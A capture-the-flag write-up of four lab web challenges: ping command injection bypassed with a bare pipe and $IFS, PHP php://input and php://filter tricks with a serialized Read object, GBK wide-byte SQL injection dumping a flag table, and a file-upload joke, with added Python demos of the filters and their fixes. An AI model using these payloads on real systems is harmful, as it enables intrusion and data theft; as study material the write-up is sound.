0x01 Preface
Before a certain "Craftsman Cup" competition, during a group's internal qualifiers, I had nothing else to do, so I went through the web challenges and kept a short record of them.
0x02 Web challenges
2.1 Command execution
1. From the request it is clear that the ip parameter ends up in a system command (a ping). There is some filtering, but it is incomplete: after a few tries, ip=127.0.0.1|ls&submit=PING goes through. The filter is probably similar to the one in DVWA's command-injection exercise, which strips '| ' (a pipe followed by a space) rather than the pipe character itself, so a bare | with no trailing space slips past it.
Send the POST with ip=127.0.0.1|ls&submit=PING; the directory listing shows flag.php.
2. Send ip=127.0.0.1|pwd&submit=PING; the working directory is /var/www/html.
3. Reading the file directly fails because spaces are also filtered, so use $IFS (the shell's internal field separator, which expands to whitespace after the filter has already run) in place of the space. Payload: ip=127.0.0.1|cat$IFS/var/www/html/flag.php&submit=PING returns the flag.
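The following is an added example, not code from the original writeup, that replays the three payloads above against a simulated filter. The server-side code is not on the page; the simulation assumes something like shell_exec("ping -c 1 " . str_replace($blacklist, "", $_POST["ip"])) with DVWA's high-level blacklist plus the space filter the writeup observed (both assumptions). It also shows the hardened form, which is an allow-list on the value rather than a longer blacklist.

```python
"""Simulated command-injection filter from the ping challenge (added example)."""
import ipaddress
import os
import subprocess
import tempfile
from typing import Optional

# DVWA high-level blacklist (order matters: '| ' is stripped before '||'),
# plus " ", which the writeup found to be filtered. Assumed, not from the page.
BLACKLIST = ["&", ";", "| ", "-", "$(", "(", "`", "||", " "]


def vuln_filter(ip: str) -> str:
    """Substring removal, like PHP str_replace($blacklist, '', $ip)."""
    for bad in BLACKLIST:
        ip = ip.replace(bad, "")
    return ip


def run_filtered(ip: str, command: str = "echo") -> str:
    """Run the filtered value through /bin/sh the way the vulnerable PHP would.

    `echo` stands in for `ping` so the demo is deterministic and offline;
    the injection happens after the first word either way.
    """
    shell_line = f"{command} {vuln_filter(ip)}"
    proc = subprocess.run(["/bin/sh", "-c", shell_line],
                          capture_output=True, text=True)
    return proc.stdout


def safe_ip(ip: str) -> Optional[str]:
    """Hardened form: accept only a syntactically valid IP literal.

    Blacklists keep losing ($IFS, ${IFS}, a bare |, <, tabs ...); validating
    the value as an IP and passing it as an argv element with no shell is the
    check that actually holds.
    """
    try:
        return str(ipaddress.ip_address(ip))
    except ValueError:
        return None


def replay_writeup_payloads() -> dict:
    """Replay the writeup's payloads against a throwaway flag.php (constructed)."""
    with tempfile.TemporaryDirectory() as webroot:
        flag_path = os.path.join(webroot, "flag.php")
        with open(flag_path, "w") as fh:
            fh.write("<?php $flag = 'flag{sample}'; ?>\n")  # constructed sample
        return {
            # '| ' is stripped, so the pipe never reaches the shell
            "pipe_space": vuln_filter("127.0.0.1| ls"),
            # a bare '|' survives and ls runs (on the cwd here)
            "bare_pipe": run_filtered("127.0.0.1|ls"),
            # the space before the path is stripped: 'cat/.../flag.php' is not a command
            "cat_space": run_filtered(f"127.0.0.1|cat {flag_path}"),
            # $IFS is not on the blacklist and expands to whitespace in the shell
            "cat_ifs": run_filtered(f"127.0.0.1|cat$IFS{flag_path}"),
        }


if __name__ == "__main__":
    for name, result in replay_writeup_payloads().items():
        print(f"{name:>10}: {result!r}")
```

Running it shows that only the $IFS variant returns the sample flag; the other three either lose the pipe or produce a command the shell cannot find.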
2.2 Deserialization
1. Visiting the given address shows the message "you are not admin !" and, in an HTML comment, the following code:
you are not admin !
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
2. The commented code shows that three parameters are read: user, file and pass.
To get past if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")), the content read from whatever $user points to must be exactly "the user is admin"; the comparison is strict (===), so case and whitespace matter.
According to the comment, file=class.php.
The pass variable is not used anywhere in the code shown, so it can be ignored for the moment.
The user check can be satisfied with the php://input wrapper: file_get_contents("php://input") returns the raw POST body, so the body of the request only needs to be the expected string. The request looks like this:
POST /?user=php://input&file=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17

the user is admin
This passes the check and includes class.php, but include() only executes the file; it shows nothing of its source. To see what class.php actually does, use another PHP wrapper, php://filter, which reads a file through a filter chain and can therefore dump any file the web server can read. Usage: php://filter/convert.base64-encode/resource=index.php
returns the content of index.php base64-encoded, so the PHP tags in it are never executed. Passing that as the file parameter:
POST /?user=php://input&file=php://filter/convert.base64-encode/resource=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17

the user is admin
The response body is the base64-encoded source of class.php:
PD9waHAKCmNsYXNzIFJlYWR7Ly9mMWFnLnBocAogICAgcHVibGljICRmaWxlOwogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsKICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpewogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICJfX3RvU3RyaW5nIHdhcyBjYWxsZWQhIjsKICAgIH0KfQo/Pgo=
Base64-decoding it gives the following code:
<?php
class Read{
//f1ag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>
The Read class has a __toString() that reads and echoes whatever $file points to, and the comment names the target, f1ag.php. So a serialized Read object can be passed in pass, with file pointing at f1ag.php through the same php://filter wrapper (the base64 encoding keeps the PHP in f1ag.php from being executed when it is read). class.php is presumably where pass is unserialized and used in a string context, which is what triggers __toString(). The request:
POST /?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1ag.php";} HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17

the user is admin
Base64-decode the response body to get the flag.
2.3 Wide-byte injection
Challenge description: the parameter is id.
Opening sql1.php directly returns garbled text (the page is not served as UTF-8); together with the hint about id, this suggests wide-byte injection.
A test with %df' confirms it: under a GBK connection the 0xdf byte joins with the backslash that addslashes() inserts to form a single two-byte character, which leaves the quote unescaped.
http://192.168.1.1:3036/sql1.php?id=%df'
1. Dump the database name
http://192.168.1.1:3036/sql1.php?id=%df%27%20union%20select%201,%20database()%23
gives the database pwnhubsql1.
2. Dump the tables
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()%23
gives two tables: article and flag.
3. Dump the columns
Going by the name, the flag is in the flag table. The table name is written as the hex literal 0x666c6167 ("flag") so that no quotes are needed inside the injected query:
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x666c6167%23
gives the columns id and thisisflag.
4. Dump the flag
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,hex(group_concat(thisisflag))%20from%20flag%23
hex() is used so the value survives whatever charset conversion the page applies on output; decode the returned hex string to get the flag.
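The following is an added example, not code from the original writeup, that shows why %df' gets past addslashes() on a GBK connection and not on a UTF-8 one, what the fix looks like, and the two hex helpers the dump steps rely on. The page does not show sql1.php; the standard setup modelled here (an assumption) is $id = addslashes($_GET['id']); $sql = "SELECT * FROM article WHERE id='$id'"; executed over a connection whose character set is GBK.

```python
"""Wide-byte (GBK) injection: addslashes() versus a charset-aware escape."""


def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): works byte by byte and knows nothing about multibyte charsets."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out += b"\\" + bytes([b])
        elif b == 0:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


def has_unescaped_quote(literal: str) -> bool:
    """Scan decoded text the way the SQL parser does: a quote not preceded by a live backslash ends the string."""
    i = 0
    while i < len(literal):
        if literal[i] == "\\":
            i += 2                      # the backslash consumes the next character
            continue
        if literal[i] == "'":
            return True
        i += 1
    return False


def build_query(raw_id: bytes, charset: str) -> str:
    """What MySQL sees: the escaped bytes, interpreted in the connection charset."""
    text = addslashes(raw_id).decode(charset, errors="replace")
    return "SELECT * FROM article WHERE id='%s'" % text


def injectable(raw_id: bytes, charset: str) -> bool:
    """True when the attacker's quote survives escaping under this charset."""
    return has_unescaped_quote(addslashes(raw_id).decode(charset, errors="replace"))


def escape_charset_aware(raw_id: bytes, charset: str) -> str:
    """Fix, modelled on mysqli_set_charset() + mysqli_real_escape_string():
    decode first, so a lone lead byte can no longer swallow the backslash."""
    text = raw_id.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def injectable_after_fix(raw_id: bytes, charset: str) -> bool:
    return has_unescaped_quote(escape_charset_aware(raw_id, charset))


def hex_literal(s: str) -> str:
    """0x... form, as in table_name=0x666c6167, so no quotes are needed in the injected query."""
    return "0x" + s.encode().hex()


def unhex(h: str) -> str:
    """Decode the output of hex(group_concat(...)) back to text."""
    return bytes.fromhex(h).decode()


if __name__ == "__main__":
    payload = b"\xdf' union select 1,database()#"   # the page's first payload, as bytes
    for cs in ("gbk", "utf-8"):
        print(cs, injectable(payload, cs), build_query(payload, cs))
    print("after fix:", injectable_after_fix(payload, "gbk"))
    print(hex_literal("flag"), unhex("666c6167"))
```

Under gbk the built query contains a two-byte character followed by a bare quote, so the union clause is live; under utf-8 the 0xdf byte decodes to a replacement character on its own and the backslash still protects the quote. The fix is the same idea MySQL's client library implements: escape after the charset is known, not on raw bytes.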
2.4 File upload
This challenge is a bit of a joke.
1. Upload any image; the response says something like "give me a give_me_flag.php and I'll give you the flag!"
2. So rename the file to give_me_flag.php, upload it again, and the flag comes back.
0x03 Summary
Overall the challenges were fairly simple, with nothing especially hard; this was just done for fun.